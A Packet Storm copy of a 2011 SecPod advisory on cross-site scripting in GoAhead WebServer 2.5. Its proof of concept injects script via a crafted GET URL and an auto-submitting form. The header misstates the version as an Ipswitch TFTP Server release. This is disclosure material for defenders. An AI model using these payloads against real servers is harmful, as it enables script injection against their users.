what you don't know can hurt you

GoAhead Webserver 2.5 Cross Site Scripting

GoAhead Webserver 2.5 Cross Site Scripting
Posted Dec 2, 2011
Authored by Prabhu S Angadi | Site secpod.com

GoAhead Webserver version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 4923f3c0b0d95898abb3ce43d962f502

GoAhead Webserver 2.5 Cross Site Scripting

Change Mirror Download
##############################################################################
# Title : GoAhead WebServer Multiple Cross Site Scripting Vulnerabilities
# Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor : http://www.goahead.com/products/webserver/default.aspx
# Advisory : http://secpod.org/blog/?p=421
# http://secunia.com/advisories/46896
# http://secpod.org/advisories/SecPod_GoAhead_WebServer_Multiple_XSS_Vuln.txt
# Version : Ipswitch TFTP Server 1.0.0.24
# Date : 02/12/2011
##############################################################################

SecPod ID: 1029 23/09/2011 Issue Discovered
04/11/2011 Vendor Notified
No Response from Vendor
02/12/2011 Advisory Released


Class: Information Disclosure Severity: Medium


Overview:
---------
GoAhead WebServer v 2.5 is prone to multiple cross site scripting
vulnerabilities.


Technical Description:
----------------------
Vulnerabilities are caused due to improper validation of input to 'name' &
'address' parameters in /goform/formTest page, which allows attackers to
induce arbitrary scripts.


Impact:
--------
Successful exploitation could allow users to execute malicious script and
steal sensitive information.


Affected Software:
------------------
GoAhead WebServer 2.5


Tested on:
-----------
GoAhead WebServer version 2.5 on Fedora Core 10.


References:
-----------
http://www.goahead.com
http://secpod.org/blog/?p=421
http://secunia.com/advisories/46896
http://www.goahead.com/products/webserver/default.aspx
http://webserver.goahead.com/forum/topic/169?replies=1#post-447
http://secpod.org/advisories/SecPod_GoAhead_WebServer_Multiple_XSS_Vuln.txt


Proof of Concept:
----------------
1) GET Request on the following page:

http://<hostip>:8080/goform/formTest?name=%3Cscript%3Ealert(4321)%3C/script%3E&address=%3Cscript%3Ealert(1234)%3C/script%3E


2) POST request:

<html>
<body>
<form name=TheForm action=http://<hostip>:8080/goform/formTest method=post>
<input type=hidden name=name value='<script>alert(document.domain)</script>'>
<input type=hidden name=address value='<script>alert(document.domain)</script>'>
</form>
<script>
document.TheForm.submit();
</script>
</body>
</html>


Solution:
----------
Not available


Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close